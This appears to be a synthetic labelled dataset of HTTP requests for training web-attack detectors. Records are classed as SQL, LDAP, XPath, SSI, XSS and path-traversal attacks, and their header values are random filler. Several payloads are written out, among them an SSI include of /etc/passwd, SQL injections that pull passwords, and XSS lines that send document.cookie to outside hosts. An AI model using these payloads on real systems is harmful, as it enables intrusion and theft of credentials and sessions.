From: xAlQbr@oetAt.gov
If-Modified-Since: Wed, 17 Nov 04 18:16:23 UTC
If-Unmodified-Since: Sun, 26 Jun 05 07:31:43 CET
If-Match: "6J_Jbcm6N4JaRzII_"
If-None-Match: *
If-Range: "7HlWqR30J0gqHV1pWE"
Max-Forwards: 9962
MIME-Version: 6.0
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Basic cmhzbjpyb0Vzc2xB
Range: -191,56-,-47911
Referer: /indEi/isul/euae/9ee2d/od1drrzu.mspx
TE: deflate;q=0.8,chunked;q=0.5
Trailer: Accept-Language
User-Agent: Mozilla/4.3 (X11; U; SunOS sun4u 9.1; er-ez; rv:9.4.0) Gecko/32974527
UA-CPU: PowerPC
UA-Disp: 3990,9142,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 2073x766
Via: eiaJe/7.7 108.213.135.57, 4.5 55.8.131.228, 7.7 213.102.41.198
Transfer-Encoding: nAgl; l60ks=mnot0apn
Upgrade: w3tun/4.7, nll2c/3.7, iotwG/2.5, ialro/2.8, zf5q/7.2
Warning: 497 53.69.32.200 "2sutvHa56sEcoGpl" "Mon, 17 Oct 05 23:56:09 GMT"
X-Forwarded-For: 192.195.46.225
X-Serial-Number: 9696710
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49583
Start - Id: 35782
class: XPathInjection
GET /oa5mkndLIaDhMVxYu/hhx2sXhnthveif1dao/aku2d/90uHLecXegnf/bbjH.aspx?8tVX0U=c_L&owdwlso5ate=618&uszaedesijeeei=ermergji&ixi=Gk+dn&eEtsbOasahttdeO=hYel&wt9c3i=o4ene0mweLe&Mst5wtv9t=Fi%27%5D+++++%7C++P++++%7C++++%2F%2Fuser%5B+++name%2Ftext%28++%29++%3D++%272wnzt&roAoUn=0nodes%3Croh8c4n&rfn=6428 HTTP/1.1
Host: 228.46.138.160
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: gzip;q=0.4, compress;q=0.9, compress;q=0.0, identity;q=0.5
Accept-Language: womf-o1cai;q=0.2, t-tIzont, Naor-etcsrsCi;q=0.6
Cache-Control: gi=6
Client-ip: 200.26.183.185
Cookie: bgawioryanqi=teg\os rci;Esro=89210;rreerp=168
Cookie2: $Version="292"
Date: Sat, 17 Jun 06 13:54:31 GMT
ETag: "Svs2sVNwEB_MZhVF"
Expect: tz6uti0s=zmuahwp;imcC=ywma7
From: debl@hectstms.net
If-Modified-Since: Sun, 01 Jun 08 24:21:11 CET
If-Unmodified-Since: Sun, 25 Nov 07 19:13:50 CET
If-Match: "CLGYTEeTI8-h2dVGGjt"
If-None-Match: *
If-Range: "QIRjJ2u8Cu8U_xf74kjY"
Max-Forwards: 6
MIME-Version: 5.9
Pragma: no-cache
Proxy-Authorization: Basic Z3Nwcjp5bVNvZWJqQQ==
Authorization: Basic bmF3c3dpWTo0b3ltZVY=
Range: -777
Referer: http://www.h2hhzy.fr/lssrst.msf
TE: trailers,deflate;q=0.8
Trailer: If-None-Match
User-Agent: nE2AHh http://www.ioaamuT.fr
UA-CPU: x86
UA-Disp: 7633,886,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 072x540
Via: 1.7 www.oEEgSee.shtml, FTP/6.0 67.219.68.118
Transfer-Encoding: compress
Upgrade: homom/1.1, t6u/8.5, 6mrrds/0.2, yassta/4.9
Warning: 192 108.52.172.141:8 "C24i" 
X-Forwarded-For: 142.75.180.148
X-Serial-Number: 76346
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35782
Start - Id: 35146
class: SqlInjection
POST /redenot3luotwtn/wgeth49ljDNL2K/nhguaPa41v5sLi/1cQD0sqH/e@ZY0upr32d/I5FT395tSGmj/8iCMTqIMf2L/siEfntaro1ttNE/nowitefhseearpea/lnAiurslnas.jpeg? HTTP/1.0
Content-Length: 114
Content-Language: hc1eilfR
Content-Encoding: deflate
Content-Location: /lnvus7/atnpo/pytjdro.fgf
Content-MD5: MjhzdnRNdWVpZ3JyeWxOaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 03 Oct 05 23:49:39 CET
Last-Modified: Sat, 24 May 08 09:28:07 UTC
Host: www.egfeid9eee.it
Connection: vtakoesp
Accept: */*
Accept-Charset: iso-8859-1;q=0.8, windows-1254;q=0.9, iso-8859-3, windows-1253, iso-8859-7
Accept-Encoding: *;q=0.1
Accept-Language: ehRs-er;q=0.6, r-trmee, h-1;q=0.9, ths6oe-neas4ia
Cache-Control: max-age=3
Client-ip: 104.27.173.11
Cookie: ptsEdzns5pc=526149
Cookie2: $Version="70"
Date: Mon, 11 Jul 05 17:40:17 CET
ETag: W/"98S_zUCS1aSpT_Sf"
Expect: eel5Noee
From: mbaudh4h@tcta.net
If-Modified-Since: Tue, 09 Mar 10 05:21:09 CET
If-Unmodified-Since: Sun, 28 Aug 05 10:01:46 GMT
If-Match: "KPeG-CUllNd8C@q"
If-None-Match: "GxGrghoiNRTNfOd1Zf"
If-Range: Tue, 02 Oct 07 09:42:20 CET
Max-Forwards: 501
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: Digest username="e7tedn"
Authorization: 7iitOy aipr=ieNad
Range: 63-383,700-,-5
Referer: /ciec.sh
TE: trailers
User-Agent: Mozilla/9.9 (Windows; U; WinNT 7.4; sh-ko; rv:1.7.9) Gecko/45141253
UA-Disp: 3713,1872,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 9440x873
Via: 1.6 www.itil1zae.png
Transfer-Encoding: eesps
Upgrade: lhX/2.1, ocobie/1.5
X-Forwarded-For: 126.226.47.150
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

mrEhymtos=3sefdt'  UNION    /**/   SELECT  jtuhloru  FROM    dba_users    WHERE     Tdohl   like    '%25

End - Id: 35146
Start - Id: 38642
class: LdapInjection
GET /lCeLHYi/qvinputyaHnbuvI4MOm/rglfnSt/rO5g4j_IgOUqN/s5gJqJVrJl2/pittS/asebh/ifbi4YMrFZ7tUnpE/LtXJboot.inidtrvg8/EN/sa.htm?nu1csnshfnq=4513&vgssith=0339457&lrn=iisgiaJe&bust94t=3932392&JevalVzkEoSX=126746624&ollk=%29+++%28%7C+%28svtlm%3Dish9*%29&-bgsoundB4SsRwxR=120020&eigfaej=ERnoisvcy9Qa1ilbs&lhis1dtsreeog=nA139I%7Cn&Ae5bncdl=3&ya=een%2B&5htro2=176 HTTP/1.0
Host: 112.251.90.180:80
Connection: close
Accept: */*
Accept-Charset: x-mac-arabic, x-mac-japanese;q=0.4, utf-7
Accept-Encoding: deflate, deflate;q=0.3
Accept-Language: *;q=0.2
Cache-Control: max-age=8180
Client-ip: 48.249.181.128
Cookie: e6p6=heltfpoeuxb4Todsf;5imantwop=746;qls=4038;neu2wrsnt2=oOVM;ntsyt9musm5sp=scriptetepcrI6te;jhotskOa=s04Us2HH
Cookie2: $Version="7"
Date: Mon, 10 Nov 08 01:31:11 GMT
ETag: "eKCAKEPvcEVEuaN0"
Expect: sedr=mo9hfett
From: Ta0d@ltoseerIl.gov
If-Modified-Since: Sun, 26 Feb 06 07:44:40 CET
If-Unmodified-Since: Wed, 05 Jul 06 23:29:34 UTC
If-Match: "AT@w0T@9Z.U5KU3efzq"
If-None-Match: *
If-Range: "HRH-EFb1dIpQwfhfR"
Max-Forwards: 617
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: NTLM ZXJBcHl0Y2RzZXVvdXBlWmRhbjd0cmp0dnRpNTFmTlJjcmV0aQ==
Authorization: ee1i s6s1sO=fl8rhr
Range: 25834-,48-325537
Referer: http://www.hIevgcs.st/a1eciny/oimycosl/etbrng9X.nsf
TE: chunked;q=0.4,deflate;q=0.6
Trailer: Accept-Charset
User-Agent: Mozilla/3.7 (Machintosh; U; Mac OS X 0.4; tv-rn; rv:3.0.9) Gecko/76486767
UA-CPU: 68000
UA-Disp: 397,637,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 601x4009
Via: 6.0 www.hnn9eise.gif:014
Transfer-Encoding: identity
Upgrade: ehlec/7.4, tt07/0.9, ls7e/0.7
Warning: 509 249.249.5.171 "evmsicsfdrnmFbad" 
X-Forwarded-For: 72.129.37.147
X-Serial-Number: 3254523964
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38642
Start - Id: 39598
class: SSI
GET /ek.sh?rpnirnagmhgcrO=11&eaV=cnisxteWorevalorservicest&sitssnnaeoti=include6uoD&neoowoceoctdcwr=9v56C9&iRtrtOrmetucr0t=te6csdd&jZ2SQ14lT-Gp=eo0hbxhO&elahn9f99pgtmtE=sw&no=%3C%21--%23include++virtual%3D%22%2Fetc%2Fpasswd%22++++--%3E HTTP/1.1
Host: 5.186.121.26
Connection: Ihwl
Accept: */*;q=0.3
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: 7eeiahsu-eosIioie
Cache-Control: max-age=54887
Client-ip: 239.19.170.214
Cookie: dovdoiht8Ee=fSriAntb3rdee;oes6ur=ople61;tiSe=)as;evMpnepkrP=413eetenithrbast;ainri7ti8op7e=mwhere
Cookie2: $Version="7"
Date: Thu, 09 Oct 08 24:24:22 CET
ETag: W/"oVLo4-iYAWfQ2T33"
Expect: etree
From: k4wcg@aEdi7a2.de
If-Modified-Since: Thu, 06 Dec 07 03:52:15 UTC
If-Unmodified-Since: Tue, 31 Oct 06 24:50:49 UTC
If-Match: "Q5nGeuFDN-Co5fSsduu"
If-None-Match: "OeqCLohxzSPbOxVKudum"
If-Range: Mon, 18 Apr 05 20:03:53 CET
Max-Forwards: 5235
MIME-Version: 2.2
Pragma: sie=iocfmnJ
Proxy-Authorization: Basic aWFOdWxhOmFhUmVzbmxk
Authorization: nHdi ga5e=ou2cdG
Range: 5591-,251722-40474
Referer: http://www.ndg9Nr.uk/Deesdim/oee77/aithnha.dll
TE: gzip;q=0.9,deflate;q=0.8
Trailer: Authorization
User-Agent: Mozilla/2.5 (Windows; U; Win 9x 4.7; ft-a2; rv:2.5.3) Gecko/14728175
UA-Disp: 7073,179,8
UA-OS: Win9x
Via: 5.4 www.sery2na.shtml, tnrak/6.5 135.93.162.126, FTP/6.5 www.Oqc5x8uc.gif
Transfer-Encoding: kxti3; maloroes=sshdth
Upgrade: t8veon/3.4, o1M/1.3, ooayr/1.5, edmt/1.1, ecik/3.7
Warning: 019 25.148.254.113 "snoelHUSeyhawd" 
X-Forwarded-For: 216.187.237.43
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39598
Start - Id: 35375
class: SqlInjection
GET /n0tlx1a/rZAe22m_XX.ize.r.js?et1tl9wuq7l=v%2F&auinseoirasp=0972071775&ttctpoleE=1677&b9KTw6A=831990&h48gfxdroIthO=7&ewDntsehtdnr=edvFcmetbt&an5wahkeyfhc=1625&trvoltddelelag=iRFCP2&astiiaoui=egken&dse=lsmkh2rlazAeeueij&window.openZN0-elocation=oNecMiitoetDnNo&zserhi=%27%3B++++begin++declare++%40ret+++varchar%288000%29+set++++%40ret%3D%27%3A%27+++++select+++%40ret%3D%40ret%2B%27+%27%2Bwolv%2B%27%2F%27%2Bpassword++from+wh+where++1R5%3E%40ret+select++%40ret+++++as+++++ret+++++into++++foo++end--&Ln%uaPh=92&eeho=a7%40m%7C%3Fh%2Fe&si=j4BfQnF HTTP/1.0
Host: www.tHaetmdgwc.com
Connection: stiM
Accept: text/*;q=0.1, image/gif, text/*
Accept-Charset: *;q=0.7
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 246.233.58.195
Cookie: j3vdppo2fo=r;xhctaes8eem=/ci i;ounbyerua04brgw=ccszai'ohblr;xetloe=806
Cookie2: $Version="914"
Date: Sun, 21 Oct 07 13:04:51 UTC
ETag: "9t_6VgnTeO2lMOGPcbH"
Expect: eeosm=3uereXt
From: 0boosr3e@ftEeuLd2wt.it
If-Modified-Since: Thu, 23 Nov 06 01:58:27 GMT
If-Unmodified-Since: Wed, 11 Nov 09 16:58:16 UTC
If-Match: "VK6tZFF1ZfIx56bA3e7W"
If-None-Match: *
If-Range: *
Max-Forwards: 2201
MIME-Version: 9.2
Pragma: Qbd3hDeU=acrtaxe
Proxy-Authorization: Basic eTR5eGFPcnc6YjJlaWxp
Authorization: NTLM bm9VMzFwc0ltcWVhVWVIaG0wZ3N0QXN0ZWFudHU5ZTR0ZWJDb2dyU09pa3RyM2M=
Range: 187-
Referer: /c3utRhoy/asauyndn/Sihe/oIB0elu.tiff
TE: deflate;q=0.9,chunked;q=0.6
Trailer: Transfer-Encoding
User-Agent: 34mbnmS (gxZCQXN_q; n7i__eup; hIKOvU@c; cfwce40)
UA-OS: Windows 95
UA-Pixels: 1597x768
Via: 3.7 33.213.144.25, FTP/0.0 235.54.172.154:9246
Transfer-Encoding: compress
Warning: 961 www.Nezio.shtml "yirNnnptNp5er5wpa6a" "Sun, 10 Jul 05 04:38:42 GMT"
X-Serial-Number: 4224204056038719
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35375
Start - Id: 47030
class: XSS
GET /a8aj0Emo1/e0Kz3dRlDMI.tiff?iliiaveme3nox=%3Cdiv++onmouseover++++%3D++%22%5Bdocument.location.replace++%28%27http%3A%2F%2Fwww.ie.com%2Fcgi-bin%2Feltiri.cgi%27%2Bdocument.cookie%29%3B%5D%22%3E HTTP/1.0
Host: 238.255.182.188
Connection: close
Accept: video/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 170.28.161.6
Cookie: rhobnrasslr6Adc=ng;thhe6beurc=ezaUasodiv7tg;hsorusnors=ymfahbereesl;ianettcpdlIedb=52325;6saodtSi3r8ct=N1hiehttpInvbscript
Cookie2: $Version="7"
Date: Tue, 23 Jun 09 15:37:24 UTC
ETag: W/"HbLZzhm6gPsVvrf@"
Expect: ntdeN6d
From: tGngiey@teedswatqu.fr
If-Modified-Since: Sat, 02 Aug 08 17:47:31 GMT
If-Unmodified-Since: Thu, 08 May 08 22:37:56 UTC
If-Match: "8e@KYxU.5mADLniHn1u"
If-None-Match: "CZpaCf5RW7L.av6emYQv"
If-Range: "szarhDVDUDo.5StC6mV"
Max-Forwards: 8
MIME-Version: 5.6
Pragma: no-cache
Proxy-Authorization: u02e nsohtc=unmnd1b
Authorization: rsea euEe=nwshmd
Range: 1054-5
Referer: http://c9mdrcde.ch/czst8hns.gif
TE: trailers,chunked,deflate;q=0.9
Trailer: If-Unmodified-Since
User-Agent: iietneue2r/8.5.7.1.8
UA-CPU: MIPS
UA-Disp: 753,986,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 7231x6416
Via: FTP/4.9 45.69.40.78, 9bet/6.7 www.hwd3s6.htm, 6.8 www.eLirlO.html
Transfer-Encoding: deflate
Upgrade: tlmcr/4.0, ihaNi/9.2, ezosme/6.2
Warning: 814 www.sz2gl.html "et0hhawps" "Sun, 03 Feb 08 08:33:56 UTC"
X-Forwarded-For: 230.76.2.187
X-Serial-Number: 40030380327368685
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47030
Start - Id: 42795
class: SqlInjection
PUT /oVE2dcSmbO1bx/eiyHF9UocHedO_u/cE.WuULxmlspvbscriptI/tei/R5nmlu86eo2dasakCt/efNvSxW/ae8rao/m9a93x/c-mTicWRYjy_niGG_/tFwRnRuh_J.exe? HTTP/1.1
Content-Length: 195
Content-Language: someo,Tj
Content-Encoding: gzip
Content-Location: /ei7asw/joec.cfm
Content-MD5: aXRjMGgwbGFlMmFkN3BybA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 21 Mar 06 02:19:42 UTC
Host: 82.177.19.44
Connection: close
Accept: audio/*;q=0.1, application/rtf, text/*
Accept-Charset: iso-2022-jp, koi8-r, windows-1252, windows-1253, hz-gb-2312
Accept-Encoding: 
Accept-Language: yh5nllsr-i;q=0.8, jhgNh-ce2r;q=0.1, nk-gy7tA;q=0.0, bxine-ksnoie, htoroki-hn;q=0.6
Cache-Control: only-if-cached
Client-ip: 244.4.219.50
Cookie: hgEas=rTsqeeitdSRrrltiel;0access_logsamFgupdatedocumentul=1ircpanfri0(o6processing-instructionscriptmochas ;qgofnon=nttaokh;n6hrLot='  OR    'pUe'  <  'X;Dxofnqjru=o@E9;osrf7e9F=190242833
Cookie2: $Version="3"
Date: Wed, 03 Oct 07 12:36:27 CET
ETag: "egCmCDWItk.xwVc5"
Expect: 100-continue
From: haCtibi@eAtie.it
If-Modified-Since: Mon, 07 Apr 08 23:09:45 CET
If-Unmodified-Since: Fri, 26 Mar 10 04:34:32 UTC
If-Match: "2O.dqBIp0EAAs4v_"
If-None-Match: *
If-Range: Fri, 19 May 06 06:38:45 GMT
Max-Forwards: 2437
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: Digest cnonce="wprrEoWe"
Authorization: nsia e7cnesn=ofrrx
Referer: http://www.0ahDat.com/Vsemk/7uwAhErz/ppiYmcj/etnTh/WtDs9fie.gif
Trailer: Via
User-Agent: yxi0aiox/4.5.8.2
Via: 9.2 214.22.199.248
Transfer-Encoding: identity
Upgrade: 4wsorn/0.6, TKqdc8/7.0
~~~~~: ~~~~~~~~~~~~~~~~~~

drjt=2lhrtreield0l&lldx=893&mPtrrpg=eTcticadus&hsizengelimcog=T&ealHiRtiCso=nt&Ddocumentl@eIFS=likeUnho&5wd7O3Iett=cstsehtdSo&1qXV9uBznrU=97640&hegedfTs=jwodnehae&HZEYy1.=61&f9m-7K=uousamt eeniio

End - Id: 42795
Start - Id: 45509
class: PathTransversal
GET /hxqd75A@Gdii0ng/e6Yndtta/hrjNmeen4e.dll?3P2XV9=ehb12dii4sm&l0=..%2F..%2F..%2FWINNT%2Fautoexec.bat&aiumo6p8t0hMh5e=7309490067&kT@W=dema+i&swskah=Zlja1XtbGi&t2nea=hep&nsg=htpassBSa+e+ireecH HTTP/1.1
Host: www.6miil.de:80
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: acvttcuN-Erlwths;q=0.2, neao-t, ytei3ael-fr06;q=0.3, lnakunm-nntseoz, lBettstn-e
Cache-Control: no-cache
Client-ip: 204.151.96.86
Cookie: 9nBr7y=ap tc;txte6otynfcfac=accept 0;ArW6Ekqeehraef=kutwwriijt2hP
Cookie2: $Version="77"
Date: Sun, 22 Mar 09 06:40:57 GMT
ETag: "F6K.JXObdJoLwBQ2Ubso"
Expect: 100-continue
From: deeIete@oniiixeM.de
If-Modified-Since: Sun, 15 May 05 10:06:11 GMT
If-Unmodified-Since: Fri, 12 Mar 10 03:24:37 GMT
If-Match: "snS-qjYQJR-3WRd"
If-None-Match: *
If-Range: "_cCHlXwbZj8EW6WB0Os"
Max-Forwards: 042
MIME-Version: 0.3
Pragma: snn3='agphalE'
Proxy-Authorization: Basic Q240c1A6bHNqZGRuZ3g=
Authorization: NTLM UG1uZGE1c2tlcVRlbXNSbmhPaWVtb2lFc21lbWVpb2FLdGFkdHR0YW9w
Range: 354-,63882-
Referer: http://meIoE.uk/9tpet8.php3
TE: deflate
Trailer: Accept
User-Agent: Mozilla/7.4 (Windows; U; Windows NT 8.1; ri-ts; rv:0.9.9) Gecko/13780557
UA-CPU: Sparc
UA-Disp: 970,9844,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 2096x915
Via: 6.0 www.s3tu.js, 7.0 www.tfefget.htm, 0.0 91.200.141.213
Transfer-Encoding: identity
Upgrade: paa/8.6, yprO/1.1
Warning: 336 www.pkli.gif "eE8hyyveresaci5o6et" 
X-Forwarded-For: 59.230.132.58
X-Serial-Number: 8223453
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45509
Start - Id: 45815
class: PathTransversal
GET /aP0c0FrzIzSPbQ@oxyl/eo4.tiff?trlaeat=unionrtn&tesi4=u&moAe8isq=c1l&earfShlsok9=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWINNT%5Csystem.ini&uih=7q-ah2tevafromh0d%2B&GW4uuQU=6&isedrrva8ttdto=m9aW&h7jpscript4V9location=mbtoARd&0nttr0cnah=641&nsxreA=cze5l40e&jtZ=lrn&wei7lgnhe=eservices&nreancubos=pasH%26o3ssbn5eKxno&t9r=ichild&l5unhcp=%3D6gwgett%5Dp HTTP/1.1
Host: 15.34.122.37
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: windows-1252, windows-1258
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: no-store
Client-ip: 38.230.25.170
Cookie: 9et=871;ulmie0nr=t5hY
Cookie2: $Version="27"
Date: Wed, 09 Dec 09 10:17:24 CET
ETag: "gPKU-46g.h2WN_PyrmG"
Expect: oa3AtW
From: rpAl@yhsq9eT1.st
If-Modified-Since: Thu, 02 Jun 05 03:00:48 GMT
If-Unmodified-Since: Wed, 31 Dec 08 22:54:44 GMT
If-Match: *
If-None-Match: "la8MYH_M63Ew4HEX"
If-Range: Fri, 16 Sep 05 07:40:19 CET
Max-Forwards: 086
MIME-Version: 4.8
Pragma: tiyrnu='ee8cq'
Proxy-Authorization: NTLM UGFBdGk4c3ZhNWk0b290ZXRodGVvb2N0UzFtT2lveXJvc2Ru
Authorization: Enne e6ota=ceehpe
Range: 2-5,-391
Referer: /svin/cxat7gbD/nrwSi0s.exe
TE: trailers,deflate;q=0.4
Trailer: Host
User-Agent: Mozilla/0.7 (Machintosh; U; PPC 6.3; ke-0e; rv:7.1.0) Gecko/87331162
UA-CPU: PowerPC
UA-Disp: 742,2997,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 0280x466
Via: 4.5 www.gveb5i.js, HTTP/2.5 152.46.226.152, HTTP/8.3 48.243.158.157
Transfer-Encoding: compress
Upgrade: T7eg/6.6
Warning: 348 176.99.74.150 "C9nbizlettg" 
X-Forwarded-For: 20.38.1.164
X-Serial-Number: 97437776345
----: ---------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 45815
Start - Id: 47987
class: XSS
GET /t@3F.ALWttJa/YgH2Ztinclude3/mRPezh1YzSCOdpGd7o3W/s8mtnrsfe/iieNtaleilinpolehcpe/ighnve7eyt4tnhetrge/r7Ii5j2o_L/aionsltm5/jFRj5aG/eeggonaedgsa9opm/us7eai2e1injp2ehlk/hS9yZDPGWC.nsf?CeZ0aall1=13163626&G1nodeG.tT=hmh%3Cs&tkeycmvpfrlxla=9613214&oendne0xk=1054&siy9wpTethrii1y=%3Cimg++src+++%3D++++%22++mocha%3A%5Bdocument.location.replace++++%28%27http%3A%2F%2Fwww.ntonic.com%2Fcgi-bin%2Forliet.cgi%27%2Bdocument.cookie%29%3B%5D+++%22+%3E&RZ@b7BTyf=09752&emeeledhjss=tKJRXxLMU&kAfbh9h=f8E-P53Q%408vM&p12FSX=64808&vFN4B=u6c_G3eM&gqnt8oi4=yKmRZNch9ju&WGkM=gfgr4spositionhfa&56=bcto4d&sotas=393833910 HTTP/1.1
Host: 151.214.79.44
Connection: keep-alive
Accept: audio/*;q=0.2, text/xml, video/quicktime
Accept-Charset: windows-1255, iso-2022-jp, iso-2022-jp;q=0.2
Accept-Encoding: *;q=0.4
Accept-Language: h-0t, oli-oai;q=0.7
Cache-Control: no-cache
Client-ip: 200.176.81.45
Cookie: id6hre1Nsx=i9;oc3aR=soetorthkcnEg;bbgsoundPwinntmQobjectayu=4
Cookie2: $Version="140"
Date: Sat, 14 Apr 07 23:51:23 CET
ETag: W/"3pne6ni6DpyrVuHOaA"
Expect: lFikdnif=fhohwa1
From: n25cwrN@ae4ttib.uk
If-Modified-Since: Sun, 14 Feb 10 02:19:07 CET
If-Unmodified-Since: Thu, 27 Nov 08 02:25:55 CET
If-Match: *
If-None-Match: "pXWzeTvtBo1nwbKy8"
If-Range: Wed, 30 Dec 09 12:35:54 UTC
Max-Forwards: 61
MIME-Version: 8.2
Pragma: 2eEsr=ifwUf
Proxy-Authorization: Digest nc=b2c271ed
Authorization: Basic cTBzbzpoaW9scw==
Range: 147-9,-924229,1-59450
Referer: http://www.anaoieoe.fr/teees7/ehiettn/h2eaagmk/qsas/riAlaSv.htm
TE: trailers,gzip
Trailer: User-Agent
User-Agent: hqreayob7p/6.5.6
UA-CPU: 68000
UA-Disp: 719,994,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 480x167
Via: 6.1 113.34.164.106, HTTP/3.8 www.theen.png
Transfer-Encoding: deflate
Upgrade: ram/6.4, IrrLes/3.6, aomon/6.0
Warning: 549 www.7tn2ri.jpg "cr4ayetrlreo6ceei3r" 
X-Forwarded-For: 62.26.34.68
X-Serial-Number: 41529
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47987
Start - Id: 41735
class: SqlInjection
GET /P3IuX.exe?TnD=qwer%27++++or+++Maausle_v.Account%3D%27uKi%400ixso.com HTTP/1.1
Host: 34.45.90.152:5
Connection: close
Accept: */*
Accept-Charset: x-mac-hebrew;q=0.2, windows-1255, macintosh;q=0.0, iso-10646-ucs-2;q=0.7, euc-kr;q=0.9
Accept-Encoding: *;q=0.4
Accept-Language: sagsrr-jJ9eli;q=0.7
Cache-Control: afl='k'
Client-ip: 136.31.14.94
Cookie: logCxmlgpzQj6bing=6este;erssoadkotpsE=nAmbrZ6pvOq;r3u=ouwcirdYgriohgE;Jn74=jynrecu8rnrT
Cookie2: $Version="0"
Date: Sat, 28 Feb 04 10:01:33 UTC
ETag: ".8@GDRHyIA4apu-uhu"
Expect: 100-continue
From: jMelerog@d2JLz3sO.it
If-Modified-Since: Mon, 17 Oct 05 04:17:58 UTC
If-Unmodified-Since: Sat, 29 Apr 06 16:45:25 UTC
If-Match: "6pOxRaB8KDXd1SARmDa"
If-None-Match: *
If-Range: "l@zlvyPiyamtfnCLEf6"
Max-Forwards: 306
MIME-Version: 6.8
Pragma: luamuo=xo
Proxy-Authorization: Basic cmllaHR0YnQ6dHJlMg==
Authorization: Basic OW9JODg6ZXJncg==
Range: -9158,6593-962,-115779
Referer: /HursL/mTal/n0nEto.avi
TE: chunked;q=0.6,chunked
Trailer: Trailer
User-Agent: Mozilla/5.0 (X11; U; Linux i586 6.3; rn-bn; rv:3.7.3) Gecko/58312783
UA-CPU: Sparc
UA-Disp: 965,4025,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 8130x9539
Via: HTTP/2.7 42.193.108.231:35251, 9.3 www.Unmeh.css, 5.0 7.229.59.159
Transfer-Encoding: compress
Upgrade: expelt/1.7, tne6Nt/2.1
Warning: 132 www.gls0.js "sseahcsnj2f1dtnEm93r" 
X-Forwarded-For: 208.165.185.87
X-Serial-Number: 81915611891
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41735
Start - Id: 47410
class: XSS
GET /oxl/rpFapfrGrNKl.html?cbaann=kRoiGfoUQDLS&eae8bilbwnregta=87296&exhoddoliefae=pat&a2odseehaeoo=806288&iorn3lnro=GZAi1eeh&rrtqredea=qafbsg2&2TNzznlnnIt4v=%3C%3Cscript+%3E%5Bdocument.location.replace%28%27http%3A%2F%2Fwww.me.com%2Fcgi-bin%2Fanntns.cgi%27%2Bdocument.cookie%29%3B%5D%3C%2Fscript++++%3E&l8eh9emIBRco=4 HTTP/1.0
Host: www.ebnto.net:80
Connection: close
Accept: text/*;q=0.2, audio/*;q=0.6
Accept-Charset: windows-1250;q=0.4, windows-1253, shift_jis;q=0.2, euc-kr;q=0.6, x-mac-hebrew;q=0.8
Accept-Encoding: identity;q=0.1
Accept-Language: *;q=0.8
Cache-Control: no-transform
Client-ip: 71.102.4.108
Cookie: uoitaipyc=fandlEh|a;etLsstenlz=1278140321;nim0=088;hissbi=9oeieonf;nph-wfm=380;samq3Lk=7
Cookie2: $Version="78"
Date: Tue, 01 Aug 06 02:16:17 GMT
ETag: "DEh1qX9bUYN6ClxWCRw"
Expect: 100-continue
From: Tfteutit@rtorijsiis.be
If-Modified-Since: Sun, 08 May 05 02:59:54 UTC
If-Unmodified-Since: Tue, 07 Jul 09 12:56:47 CET
If-Match: *
If-None-Match: "DWaCN5fv8wwLn_7mv1H"
If-Range: Sat, 23 Aug 08 16:30:51 GMT
Max-Forwards: 1
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: nuoe nldti=eta2nt
Authorization: NTLM VDdTY2VlZWJvbm5zaXlvcjdudHNjZnFOa2RzYWNsQUVhaGFpZTly
Range: 2506-,-467
Referer: /ees9bets/0wx4y/tPonioil/uogi.mpg
TE: chunked,deflate
Trailer: If-Range
User-Agent: Mozilla/6.1 (X11; U; Open BSD i386 2.0; d6-nn; rv:2.9.5) Gecko/01896165
UA-CPU: StrongARM
UA-Disp: 815,562,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 1670x058
Via: FTP/4.5 14.95.43.253
Transfer-Encoding: deflate
Upgrade: sEtli/1.4, eqt/6.4, eixu/1.5
Warning: 029 www.8bsannTr.png "tiuS0ahxectarQgg" "Sat, 24 Jan 04 03:40:28 GMT"
X-Forwarded-For: 39.101.79.171
X-Serial-Number: 308623860722322067
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47410
Start - Id: 44712
class: PathTransversal
